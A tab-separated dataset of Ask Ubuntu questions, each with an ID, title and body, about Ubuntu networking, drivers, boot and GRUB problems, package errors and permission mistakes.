431536	how do i fix my internet on ubuntu 12.04 server ?	i have ubuntu server 12.04 installed with no gui . i installed owncloud and webmin a few months ago with no problem , so i know my internet used to work . the power went out while the pc was on one day 2 months ago and i did not turn the pc back on until yesterday . now i have no internet connection . does anyone know how i can fix this , or should i just reinstall ubuntu ? this is the output of ifconfig -a : eth0 link encap : ethernet hwaddr 00:06:4f:4a:66 : f0 broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) eth1 link encap : ethernet hwaddr 00:16 : ec:05 : c8:9c broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr 127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:1800 errors:0 dropped:0 overruns:0 frame:0 tx packets:1800 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:143896 ( 143.b kb ) tx bytes:143896 ( 143.8 kb ) i have a wired connection . here are the contents of etc/network/interfaces : # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet dhcp i tried assigning a static ip to eth2 , which is a adapter i just added , and now when i run ifconfig it shows a inet addr of 192.168.1.100 . so i have an ip now . when trying to add the default gateway , i typed route add default ge 192.168.1.1 , and it said , usage : inet route [ -vf ] del { -host|-net } target [ /prefix ] [ gw gw ] [ metric m ] [ [ dev ] if ] there are 5 more lines of writing associated with this route error , but i do not want to type all that out unless it is needed . does anyone know what to do ?
431537	no sound in vmware workstation 10	i installed ubuntu 12.04 on vmware workstation 10 and i 'm unable to hear anything . when i went to sound settings , on the output see a dummy output . any advise ? ? ? thanks
431538	trying to install ubuntu from dvd get message `` no operating system '' and everything halts	i know there is no operating system on my computer , i had the hd 100 % wiped . i was intending for ubuntu to be my operating system . am i to assume i can not install from a dvd because i have no operating system ? is there something i 'm missing ? i tried with puppy linux too , because i believed that could be operated from the disc . same thing , `` no operating system '' .
431540	how to cancel time conversion in librecalc ?	whenever i add an `` hour '' entry on a libreoffice calc field , it converts into a full hour format after i hit enter . e.g . i get the following conversion : 17:00 = > 05:00:00pm any idea how to disable this ?
431541	a6200 wifi usb adapter for ubuntu12.04	i recently bought a new wireless card for a computer i built but forgot to make sure there was any kind of linux support . i was wondering if anyone could help me set up the drivers for the system ?
431543	ubuntu ( on pc ) crashes communicating with beaglebone black via ip over usb	i am trying to connect to a beaglebone black using a usb cable . bbb has an interface called something like ip address over usb . it works fine on a windows 7 pc , but not on my old ( 2001 ) 32-bit dell dimension-8200 running ubuntu 12.04 lts . as i plug in the bbb to a usb connector , there is a lot of activity on the bbb leds . after a while a window opens on the pc saying `` system program problem detected '' . `` sorry , ubuntu 12.04 has experienced an internal error . '' i click on the button `` show details '' . the following details are shown : executablepath /usr/bin/nm-applet package network-manager-gnome 0.9.4.1-0ubuntu2.3 problemtype crash title nm-applet crashed with sigsegv in nm_device_get_state ( ) ... and so on . similar problems keep popping up after a while . the bbb is supposed to mount in the file system like a usb memory stick , but it does not . would it help to upgrade ubuntu ? is it perhaps the old hardware causing the problem ? ideas anyone ? edit : bbb is running ร ngstrรถm , not ubuntu .
431544	external hdds do n't appear until unplugged and plugged back in	i 'm trying to use my ubuntu computer as a file/media server , and i have four removable hdds plugged in . after a fresh boot , two of them mount , or appear in fdisk or /dev/sd* , but they do appear in lsusb . after i unplug them and plug them back in , they appear and mount fine . i have usb_storage in /etc/modules , which was suggested somewhere , but it did n't help my fstab : uuid=4c10e94110e9329e /media/2tb auto noauto , nosuid , nodev , nofail , x-gvfs-show 0 0 uuid=c6026af6026aeabf /media/3tb2 auto noauto , nosuid , nodev , nofail , x-gvfs-show 0 0 uuid=08a4462aa4461a98 /media/2tb2 auto noauto , nosuid , nodev , nofail , x-gvfs-show 0 0 uuid=18a2f5c4a2f5a682 /media/3tb fuseblk noauto , nosuid , nodev , nofail , x-gvfs-show 0 0 the 08 ... and 18 ... do n't mount . ( i switched 3tb to fuseblk because manually mounting it with auto complained that i did n't specify a filesystem ) trying to mount them after boot with mount /media/3tb -v gives no output lsblk : name maj : min rm size ro type mountpoint sda 8:0 0 931.5g 0 disk ├─sda1 8:1 0 350m 0 part ├─sda2 8:2 0 878.6g 0 part ├─sda3 8:3 0 1k 0 part ├─sda5 8:5 0 42.7g 0 part / └─sda6 8:6 0 10g 0 part [ swap ] sdb 8:16 0 931.5g 0 disk └─sdb1 8:17 0 931.5g 0 part sdc 8:32 0 1.8t 0 disk └─sdc1 8:33 0 1.8t 0 part /media/2tb sdd 8:48 0 2.7t 0 disk └─sdd1 8:49 0 2.7t 0 part /media/videos3tb
431546	wireless not working on imac g4	i have an imac g4 running ubuntu 12.4 ppc . when i try to connect to a wifi network , the computer does n't seem to remember the ssid : # iwconfig wlan0 essid < ssid > # iwconfig ... wlan0 ieee 802.11bg essid : < ssid > mode : managed frequency:2.427 ghz access point : not-associated ... a few minutes later ... # iwconfig ... wlan0 ieee 802.11bg essid : off/any mode : managed frequency:2.427 ghz access point : not-associated ... i can provide other logs/output as needed .
431547	can a gif be used as the ubuntu splash screen instead of the boring purple one ?	i 'm using ubuntu builder and i really want to change the splash screen . it 's my first time using ubuntu builder , and most of the work is being done offline ( limited access ... ) . by following the instructions in this au post i 've managed to set a custom plymouth background wallpaper . it is just a still image . but i was just curious to know if i could use an animated gif image for the splash-screen replacing the need for the codes in plymouth script to swap through .png images for boot animation .
431550	how do i remove or reinstall ubuntu in windows 8 uefi dual when ubuntu is set as default ?	note : it is a uefi dual boot with windows 8 and ubuntu grub is set as default bootman . i am looking to do a reinstall of ubuntu since i accidentally apt-get removed system packages . i can not drop to root shell and do sudo apt-get install -- reinstall ubuntu-desktop because it gives me a few errors saying that critical dpkg config files are missing or something like that . if possible , i would just like to reinstall rather than remove and install , as this would save my files ( the files have been backed up on a windows 8 partition . ) and if i would need to reinstall , can i just remove the partition and then reinstall via dvd and ubuntu grub would work , or would i have to set windows 8 as my default uefi boot manager ? thanks , thegreatwidi
431552	malformed line in source list , getdeb	e : malformed line 2 in source list /etc/apt/sources.list.d/getdeb.list ( uri ) ^^ this is what i get back , earlier i was trying to get pokemon online to install properly , and it was n't working , so i tried to get getdeb , now it wo n't check or show updates without giving me the message above , what am i doing wrong ? edit : now it keeps sending me the information that it 's experiencing an error continually . edit 2 : these are the contents of the file /etc/apt/sources.list.d/getdeb.list : deb http : // archive.getdeb.net/ubuntu precise-getdeb apps deb http : // archive.getdeb.net/ubuntu saucy-getdeb apps deb http : // archive.getdeb.net/ubuntu saucy-getdeb apps deb http : // archive.getdeb.net/ubuntu precise-getdeb games
431554	/etc/sudoers is owned by uid 1000 , should be 0	in order to do something , i misused chown and clearly rewrote permissions where i should not have . now , when i sudo , i get the following message : sudo : /etc/sudoers is owned by uid 1000 , should be 0 sudo : no valid sudoers sources found , quitting sudo : unable to initialize policy plugin i have followed advice from http : //ubuntuforums.org/showthread.php ? t=1772599 and have booted into recovery mode and changed permissions , which seems to work ( at least it tells me permissions have changed ) . currently , the permissions in my /etc folder look like : -r -- r -- -- - 1 me-user root 745 jul 16 2012 sudoers drwxr-xr-x 2 me-user root 4096 may 4 2013 sudoers.d in recovery mode , i went through : chown root : root /etc/sudoers chmod 440 /etc/sudoers chown -r root : root /etc/sudoers.d chmod 755 /etc/sudoers.d chmod 440 /etc/sudoers.d/* and , unless i exited recovery mode wrong , the same problem persists . if anyone has any advice or tips , i would dearly appreciate it . i want my sudo back ! and yes , i know misusing chown was very very wrong and i deserve it ...
431556	installed fglrx and selected fglrx-update from software settings - now black screen on boot	i have been tinkering around because i find that ubuntu 13.10 ( which i have as dual boot on my asus laptop ) get my computer a little hot and i get some crashing issues sometimes when watching videos , and more crashes when using slimboat . reading around a bit , i ( wisely or otherwise ) installed fglrx , and then i went into system settings > software updates and in one of the tabs there selected `` proprietary driver fglrx update '' . on rebooting my laptop into ubuntu , i hear the login sound , but get a black screen . since i can not get into system settings now to change the graphics card driver back , what can i do ? my graphics card is an ati mobility radeon hd 5470 1 gb . my laptop is 86_64 bit . edit : i looked at the page that gives advice about how to fix the problem of booting to a black screen . i installed ubuntu a few weeks ago successfully , and have been using it just fine with the exception of some crashing with video files and browsers , as explained above . so the advice for a new install does n't apply , and grub is working just fine so the dual boot advise does n't apply either . i did follow the advise about ati radeon drivers : if your graphics card is ati , follow these steps : in the grub menu at startup , press `` e '' ; then use the arrow keys to replace quiet splash with radeon.modeset=0 . then press the ctrl+x key combination to boot . this did not work either ( and i also tried `` nomodeset '' ) . although i did get the purple screen straight out of grub ( which i was n't getting ) , only to go black before the login screen and the login sound . the issue here is that i messed around with the graphics driver , and would like to be able to get in long enough to change my settings as explained in my opening 3 paragraphs .
431559	gwibber twitter authorization problem	i 've tried to authorize my twitter with gwibber before ( i 've reinstalled ubuntu because some other problem ) , now i ca n't authorize any twitter account , it just tells me `` ssl is required '' and i have ssl installed in my system , or do i have the wrong ssl library ?
431564	how do i fix ugly boot screen when using nvidia drivers ubuntu 13.10	i have recently installed ubuntu 13.10 64bit . it was , by default , using the nouveau display driver , however , this caused suspend to fail , but installing a proprietary driver resolved this issue but created an ugly low res boot screen .
431568	after upgrade , on boot the screen stays black , ubuntu 12.10	i 'm sorry , my english is not very well . i installed ubuntu 12.10 via software updater on ubuntu 12.04 , and after reboot , the screen stays black with a fixed _ white . i ca n't use any command here : it does n't do anything . i can login via terminal on recovery manager , and i tested black screen on login but does n't solved my problem . is there a solution ? and if no ... how can i reset ubuntu to 12.04 ? thanks !
431573	transfer windows installer to a partition	i have been using ubuntu for a while from the windows installer version . so the data resides within my windows partition . i need to re-install windows for other reasons , but i do n't want to loose my ubuntu . is there a way i can move the installation to its own partition ?
431575	how do i fix the synaptic package manager ?	when i try to update the software this is what it says : e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_main_i18n_translation-en e : the package lists or status file could not be parsed or opened . e : _cache- > open ( ) failed , please report .
431580	how do i change the `` wireless mode '' on my network adapter from b/g/n to just b/g ?	i recently purchased a edimax ew-7811un usb wi-fi adapter . so far , it has been a really finicky device , but i was able to get it to work somewhat reliably on my windows partition by setting the `` wireless mode '' to b/g instead of b/g/n and would like to try the same setting on my ubuntu partition . i 've already downloaded and installed the latest drivers for linux . so far i have tried the command : sudo iwconfig wlan0 modu 11g but it returns error for wireless request `` set modulation '' ( 8b2f ) : set failed on device wlan0 ; operation not supported . any help would be appreciated . edit : when i enter cat /sys/module/mac80211/parameters/ieee80211_default_rc_algo it returns no such file or directory edit2 : dmesg | grep -i algo returns [ 20.228550 ] == > rtw_set_key algorithm ( 2 ) , keyid ( 2 ) , key_mask ( 0 ) [ 80.541946 ] == > rtw_set_key algorithm ( 2 ) , keyid ( 2 ) , key_mask ( 0 ) [ 117.738698 ] == > rtw_set_key algorithm ( 2 ) , keyid ( 2 ) , key_mask ( 0 )
431581	broadcom wireless driver broke apt , ca n't fix it	i just got an old laptop and in an attempt to get the wireless working , i searched for a way to get the wireless working . i found a way , but somewhere in there , something went wrong and i did n't know . apt had finished running , so i thought all was well . went for a reboot and did n't have wireless . i tried another way , just a reinstall of the same packages i think , told me to use dpkg configure -a , but when i did , the whole screen blanked and went to text with the mouse still in front . could n't do anything , even switch to another session with ctrl-alt-f1/2 . rebooted , tried again , same problem . what can i do to get apt back and wireless working ?
431584	blank screen on entering the password ?	i recently installed the nvidia driver to my lenovo laptop.after that i updated the system , from then onwards after entering the password it is showing the blank screen and background process are running as usually.so what can i do now ?
431585	how to use custom ubuntu images with ubuntu juju ?	i am using ubuntu juju in windows azure platform . i want to use customized ubuntu image to create the virtual machines using juju . how to use customozed ubuntu images to create virtual machines using ubuntu juju ?
431590	reseiting forgotten admin password on ubuntu 13.10 ?	i have dual booted my pc with win7 and ubuntu 13.10.now i have forgotten my admin password on ubuntu 13.10 . how to retrieve/reset the password ? i tried mount -rw -o remount/ command but manipulation error wo n't go .
431592	booting lubuntu i get edic checksum is invalid reaminder is 8 error	on-boot i get edid checksum is invalid , remainder is 8 error . the error does n't seem to cause any problems and lubuntu continues to load and everything seems to be ok . i had to add the battery indicator and i did set the laptop=yes thing in the config file to get the power manager to auto load on start but would love to solve the edid error . can anyone please help . on looking at the lspci -v output i can see that the vga compatible controller is 945gse express integ and the display controller is 945gm/gms/gme , can anyone suggest anything , i am not an experienced linux user but i have not found much on google .
431593	how to share the files from host to guest in virtual box ? host-ubunutu12.04/guest-tails	i know that most ppl dont use or have even heard of tails , but i was wondering if anyone could help me out here . tails is amnesic os .
431594	installing ubuntu touch failed nexus 7 2012	i tried to install the trusty version of ubuntu touch on my 2012 nexus 7 . i followed the directions here and i entered sudo ubuntu-device-flash -- channel=devel -- bootstrap until my terminal returned can not push /home/nick/.cache/ubuntuimages/devel/grouper/version-194.tar.xz to device ( i also tried to do it manually , with that failing as well )
431597	need to reset completely	bought a laptop off a friend and i have no idea how ubuntu works . we stopped talking before he helped me do a reset on it and long story short i now have to reset the entire computer and get it back to windows os and i do n't have his account password . can anyone help ? thank you in advance peoples : )
431599	non free firmware	i just installed lubuntu 13.10 . i was able to connect with my wifi device . after the install my computer would not recognize my wireless device cnet model cqu-906 . how can i download the correct firmware needed for my wireless device ?
431600	errors while using 'sudo apt-get update '	w : failed to fetch cdrom : //ubuntu 13.10 _saucy salamander_ - release amd64 ( 20131016.1 ) /dists/saucy/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms e : some index files failed to download . they have been ignored , or old ones used instead . i am new to ubuntu so i dont know how to solve this error . this is shown at the end after executing 'sudo apt-get update ' command . i think this is preventing me from installing new apps like wine 1.7 .
431604	why does apt removes unwanted packages when giving * as suffix ?	i did a sudo apt-get remove ruby* and then i saw that some grub packages were being removed too so i went to installed back those packages which log showed to have removed i set grub to work on my /sda ( in general , not any number ) when was installing back . should all be ok or should i fear for my system and plan installing/reconfiguring more of grub . and , why did this happpen ?
431606	what should i do when i get 'there are stopped jobs ' error ?	i face this type of situation many times . for example , whenever i try to open some file in emacs with sudo rights using : sudo emacs tet.c & instead of asking me for the password ubuntu just starts emacs process without any emacs window or any output on terminal ( except for the pid ) see the image ( if i do n't use ' & ' then it will ask me for the password ) : i have two questions related with this : what should i do when i get error that 'there are stopped jobs ' ? how do i identify all such stopped jobs and kill them ? once i clear the terminal i wo n't have pids of these stopped processes . why is ubuntu/emacs behaving like this ? why does n't it ask me for the password ?
431608	error before logging in	whenever i logon to my lubuntu 13.10.it shows me the logo of lubuntu and then shows me a blank screen.i have lubuntu 13.10 as well as ubuntu 12.04 lts.what can i do change the lubuntu into ubuntu 13.10 after repairing it ?
431612	how to install nvidia proprietary driver without getting a blankscreen after rebooting and login ?	i tried all of these methods 1st method sudo add-apt-repository ppa : xorg-edgers/ppa sudo apt-get update sudo apt-get install nvidia-331 2nd method sudo add-apt-repository ppa : xorg-edgers/ppa sudo apt-get update sudo apt-get install nvidia-current nvidia-settings 3rd method after downloading the driver from website of nvidia , i installed it and the same problem occurred any suggestions ? ?
431620	how to install ubuntu next to windows 7 on an encrypted truecrypt system ?	is there any way to install ubuntu next to windows 7 on an encrypted truecrypt system ? windows 7 is using the whole disk encryption . i know i can start from scratch and install both the systems , but i do n't want to do that . using vms is not an option either . i would like to install ubuntu 12.04 ( in case it matters ) .
431622	can not find the network manager icon	one day i opened my pc as usual , but there was something wrong with the network . i did n't find the logo of wlan/lan . i tried to edit this file in vim : /etc/networkmanager/networkmanager.conf changed false to true and restarted . but it does n't work ! please help !
431627	how to properly install pyside via pyenv ?	i 'm running ubuntu 13.10 with python 3.3.4 , installed via pyenv . running sudo apt-get install python3-pyside installs pyside in /usr/lib/python3/dist-packages/pyside , and i can make a symlink to that in my pyenv python 's site-packages directory . this means i can import pyside in python , but i get importerror when trying to import qtgui from pyside ; ditto for similar modules as well : importerror : can not import name qtgui the pyside directory includes the qtgui.cpython-33m-i386-linux-gnu.so file , but it 's not being accessed , i guess . i have fiddled with pythonpath and ld_library_path without success . i ca n't find much available information on this , so any advice would be appreciated .
431631	how to use fusa gamepad on ubuntu 13.10 : ?	i 'm trying to use my psp as a gamepad using fusa gamepad . it makes the psp function as a generic dual analog stick controller . it works without problems on windows and mac os x . on ubuntu 13.10 , i 've downloaded jtest-gtk and joystick and it detects the controller fine . all the axes and buttons work , etc . the problem occurs when i try to actually use the controller on anything . for example , i 'll try using it on ppsspp and the controls seem to be going haywire ( random things getting pressed ) when i move the analog stick . overall it just feels like the buttons/axes are all mixed up badly ( pressing up makes it detect that i have 7 buttons pressed down ) . what can i do about this ?
431633	unable to hibernate using sudo pm-hibernate	i have recently installed ubuntu 13.10 alongside windows 7 . the hibernate does not work from command prompt using sudo pm-hibernate , whereas the suspend works fine using sudo pm-suspend . what could be the problem ? how do i solve this ? output of sudo fdisk -l : disk /dev/sda : 100.0 gb , 100030242816 bytes 255 heads , 63 sectors/track , 12161 cylinders , total 195371568 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xe0779162 device boot start end blocks id system /dev/sda1 * 63 195366464 97683201 7 hpfs/ntfs/exfat out put of cat /etc/fstab : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > /host/ubuntu/disks/root.disk / ext4 loop , errors=remount-ro 0 1 /host/ubuntu/disks/swap.disk none swap loop , sw 0 0 output of sudo blkid -o full -s uuid : /dev/loop0 : uuid= '' 59cea3d6-37da-4a92-8ccf-f500a76750ff '' /dev/sda1 : uuid= '' a4d4a3cad4a39cd4 ''
431635	cairo-dock disabled my restart and shutdown options	i had cairo-dock installed and i had added it on start up . later i removed it using apt-get -- purge remove and removed its packages using synaptic package manager . yet i can access cairo-dock and nothing comes when i click on shutdown or restart . any help ?
431636	jupiter 0.1.9 is disabling my touchpad automatically when ubuntu starts . how to fix this ?	i need to manually press fn+f3 twice to disable and then re-enable the touchpad . i do it every time i start ubuntu . how can i fix this ? thanks
431637	ubuntu gtkmm 3 window resize	i have a window and this is it 's size : window- > set_default_size ( 600 , 400 ) ; the problem is when i set this : window- > set_resizable ( false ) ; the window will shrink . look in picture : below http : //oi62.tinypic.com/e86685.jpg
431642	wifi card issues	what is wrong i have a hp pavilion dv6000 se running windows vista and has 2gbs of ram . but i just dual booted my computer after installation of ubuntu 13.10 and my wireless card does n't work at all . i went into terminal and typed sudo lshw -c network the info said the description and all the info of my network controller but it did n't state whether it was operable . it did state that it was 32 bit . help please . do i have to change ubuntu for 64 bit to 32bit ?
431643	unable to disable session restore on xubuntu 12.04	i am using xubuntu 12.04 with the xfce 4.10 ppa , and since updating xfce i can not disable the automatic session restore . i have disabled the relevant options in 'session and startup ' , but it makes no differences and all my windows are still restored after login . if i remove the content of .cache/sessions it works for the next reboot but after that the session will be restored again . i thought about writing a script to delete it at startup , but i was wondering if there were any proper fixes to this issue . thanks ,
431645	external sound on right not working ubuntu 13.10 x64	my internal sound is working perfectly , but as soon as i plug in a speaker/headphone i hear from only one of them . the same speakers/headphones work perfectly with other computers . i am new to here , i use ubuntu 13.10 x64 on my asus k55
431647	installing/booting windows installation from grub ?	i need access to windows for school . i had an issue dual-booting with windows 8 so now i only have ubuntu . i made a windows 7 usb installer but for some reason the bios wo n't recognize the usb . i was hopping and wondering if there is a way to load an usb through grub ?
431650	ati driver issues - 13.10	i am installing xubuntu 13.10 on an old laptop i have . when i boot up to the installer , the display is fine , everything seems to be working perfectly , however , on the xubuntu boot screen , the colours all look weird ( they 're all pink and green ) . i noticed the same when i had kubuntu running on it , and i just figured that it was because the system was n't powerful enough for kubuntu . now i 'm thinking it has to be a display driver issue . but how do i fix it ? the laptop has an ati mobile radeon 7500 card , so i suppose i need to install the right drivers ...
431652	hard drive missing after installation	iâm new to ubuntu , i have 2 partition on my previous system running on vista . c drive for the os and d drive for data . when i install ubuntu , i selected option to replace vista , and after install , i did not see any partitions in my system any more , is that option means to delete all partitions ? or how can i check and recover this ?
431659	ubuntu 13.10 gnome : visual glitch when hovering over icons	i recently installed ubuntu gnome 13.10 , and this is the only obvious issue so far . every time i hover over an icon of any sort , a pixelated green glitch occurs on the icon that the mouse is hovering over . i am baffled by this issue , as it does n't seem like anyone has asked a question relating to this issue before . someone please help ! further details can be provided . 00:02.0 vga compatible controller [ 0300 ] : intel corporation haswell-ult integrated graphics controller [ 8086:0a16 ] ( rev 09 )
431661	can i have a dhcp interface in /etc/network/interfaces ?	i have an interface already configured for an internal interface , which is static under eth0 . my question is , can i create a dynamic outfacing interface under eth1 . the reason i want to so this is because , my isp does n't support fixed external ip addresses and i am running a server using dyndns . the problem is , i need to set a rule in iptables to forward traffic to my external ip and i need an interface to specify it to iptables , therefore if i use my current external ip it will change . my output of ifconfig : root @ helloworld : ~ # ifconfig eth0 link encap : ethernet hwaddr 00:0e:7f : a9:10:54 inet addr:192.168.0.8 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :20e:7fff : fea9:1054/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:357 errors:0 dropped:0 overruns:0 frame:0 tx packets:358 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:37555 ( 37.5 kb ) tx bytes:43900 ( 43.9 kb ) interrupt:20 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:36 errors:0 dropped:0 overruns:0 frame:0 tx packets:36 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:3467 ( 3.4 kb ) tx bytes:3467 ( 3.4 kb ) root @ helloworld : ~ #
431663	accelerometr in lenovo thinkpad e330	how can i enable active hdd protection on lenovo tp edge 13 . ubuntu 13.10 hdapsd says that there is no accelerometer , but in windows it worked ! i tried to shake a laptop while it was reading hdd , but hdd did n't parked
431664	ubuntu installation failed ; win7 unbootable ; no installation or recovery discs	( before i begin , please excuse me if there are some english mistakes . ) so yesterday i tried to install ubuntu for the very first time ( yay ! ) . i was using a bootable usb flash drive with ubuntu 13.10 64 bits . when booting from it , it did n't seem to notice my installed win7 so i had to choose `` something else '' in the installation type window . i therefore had to manually set the disk partitionning . as i am no expert , i followed a guide but i do n't remember exactly what i did there . i remember resizing the partition containing win7 to create a new one and put ubuntu in it . the installation started and an error occured . turned out my bootable usb flash drive was corrupted or something . the problem is , i was n't able to boot from win7 until then . when i turn my laptop on ( a vaio sve14a1v1e , if it helps ) , it shows the message `` operating system not found '' . using legacy or uefi boot mode does n't change anything . i checked the boot priorities . i tried using boot-repair . this is what it gives : http : //paste.ubuntu.com/7058434/ when using ubuntu 's disk utility , this is what it gives : http : //s28.postimg.org/73xjx75r1/screenshot_from_2014_03_09_09_55_18.png i guess i have to set the biggest volume partition type as something , but i 'm not sure and i 'm afraid to lose my data if i do something wrong . any suggestions ? thanks a lot for your help ! note : unfortunately , i do n't have the win7 installation disc nor recovery disc . they were not sold with the computer , and i forgot about creating a recovry disc myself ... i tried using recovery discs from other computer with win7 , but it says their versions are not compatible when i try to boot from them .
431666	two instances of conky keeps flickering	i would like to have two instances of conky running om my screen ( possibly three later on ) as i would like to show statistics from my two raspberry pi 's . i 'm running xubuntu/xfce4 by the way : ) i already have the two config files ready and the local script executes like this sh -c `` sleep 10 ; conky ; '' and the remote script executes like this ssh -x pi @ 192.168.1.190 sh -c `` sleep 10 ; conky ; '' both scripts seem to be working individually - bot not at the same time . when they both run the instances flickers and switch between being visible . both scripts are almost identical - and really not very fancy - just useful . # general configurations out_to_x yes # update interval in seconds update_interval 5.0 # text alignment , other possible values are commented alignment bottom_left # aligning vertical gap_y 15 gap_x 10 < -- this variable is set to 100 in the local script # use double buffering ( reduces flicker ) double_buffer yes text $ nodename - $ sysname $ kernel on $ machine $ stippled_hr $ { color lightgrey } uptime : $ color $ uptime $ { color lightgrey } - load : $ color $ loadavg $ { color lightgrey } cpu usage : $ { color # cc2222 } $ cpu % $ { cpubar } $ { color lightgrey } ram usage : $ color $ mem/ $ memmax - $ memperc % $ { membar } $ color $ stippled_hr $ { color lightgrey } file systems : root $ color $ { fs_used / } / $ { fs_size / } $ { fs_bar / } slave $ color $ { fs_used /media/slave } / $ { fs_size /media/slave } $ { fs_bar /media/slave } can anyone help me ?
431668	nvidia rendering problem	i am using ubuntu 13.10 64-bit and i installed the latest version of the nvidia driver . after the driver installation some window parts became black . for example : i have n't found the solution . how can i handle this ? specs : ⠀cpu : intel core i5 2.27ghz ⠀graphics : geforce 310m ⠀os : ubuntu 13.10 64-bit
431672	failed to install grub during upgrade to 13.10	i have upgraded our ubuntu 12.10 remote server to 13.10 . during the upgrade process , i was asked which partition to install grub2 to . i did n't know which drive was the boot drive , thus i checked all drives . the grub boot loader was previously installed to a disk that is no longer present , or whose unique identifier has changed for some reason . it is important to make sure that the installed grub core image stays in sync with grub modules and grub.cfg . please check again to make sure that grub is written to the appropriate boot devices . if you 're unsure which drive is designated as boot drive by your bios , it is often a good idea to install grub to all of them . note : it is possible to install grub to partition boot records as well , and some appropriate partitions are offered here . however , this forces grub to use the blocklist mechanism , which makes it less reliable , and therefore is not recommended . grub install devices : [ * ] /dev/sda ( 3000592 mb ; toshiba_dt01aca300 ) [ * ] /dev/sdb ( 3000592 mb ; toshiba_dt01aca300 ) [ ] /dev/md1 ( 536 mb ; :1 ) [ ] /dev/md2 ( 1099510 mb ; :2 ) later , i got this message : grub failed to install to the following devices : /dev/md2 do you want to continue anyway ? if you do , your computer may not start up properly . writing grub to boot device failed - continue ? i know that /boot is mounted to /dev/md1 . however , since it 's a remote server , i should be % 100 sure before rebooting it . $ mount /dev/md2 on / type ext4 ( rw ) proc on /proc type proc ( rw ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/cgroup type tmpfs ( rw ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , gid=5 , mode=620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) none on /sys/fs/pstore type pstore ( rw ) /dev/md1 on /boot type ext3 ( rw ) /dev/md3 on /home type ext4 ( rw ) systemd on /sys/fs/cgroup/systemd type cgroup ( rw , noexec , nosuid , nodev , none , name=systemd ) how can i be sure that grub was installed correctly ? the output of sudo parted -l is : $ sudo parted -l model : ata toshiba dt01aca3 ( scsi ) disk /dev/sda : 3001gb sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags 5 1049kb 2097kb 1049kb bios_grub 1 2097kb 8592mb 8590mb raid 2 8592mb 9129mb 537mb raid 3 9129mb 1109gb 1100gb raid 4 1109gb 3001gb 1892gb raid model : ata toshiba dt01aca3 ( scsi ) disk /dev/sdb : 3001gb sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags 5 1049kb 2097kb 1049kb bios_grub 1 2097kb 8592mb 8590mb raid 2 8592mb 9129mb 537mb raid 3 9129mb 1109gb 1100gb raid 4 1109gb 3001gb 1892gb raid model : linux software raid array ( md ) disk /dev/md0 : 8589mb sector size ( logical/physical ) : 512b/4096b partition table : loop number start end size file system flags 1 0.00b 8589mb 8589mb linux-swap ( v1 ) model : linux software raid array ( md ) disk /dev/md1 : 537mb sector size ( logical/physical ) : 512b/4096b partition table : loop number start end size file system flags 1 0.00b 537mb 537mb ext3 model : linux software raid array ( md ) disk /dev/md2 : 1100gb sector size ( logical/physical ) : 512b/4096b partition table : loop number start end size file system flags 1 0.00b 1100gb 1100gb ext4 model : linux software raid array ( md ) disk /dev/md3 : 1892gb sector size ( logical/physical ) : 512b/4096b partition table : loop number start end size file system flags 1 0.00b 1892gb 1892gb ext4
431673	ubuntu consumes more power than windows-what to do ?	i want to install ubuntu on my dell inspiron 15 ( i3 ) . however , i found that the battery drains much faster than windows 8 . i read that windows controls load to the processors , graphics card and fan , such that power consumption is low.i also remember reading around 6 months back that ubuntu was not capable of doing such power management . is there any change to this with ubuntu ?
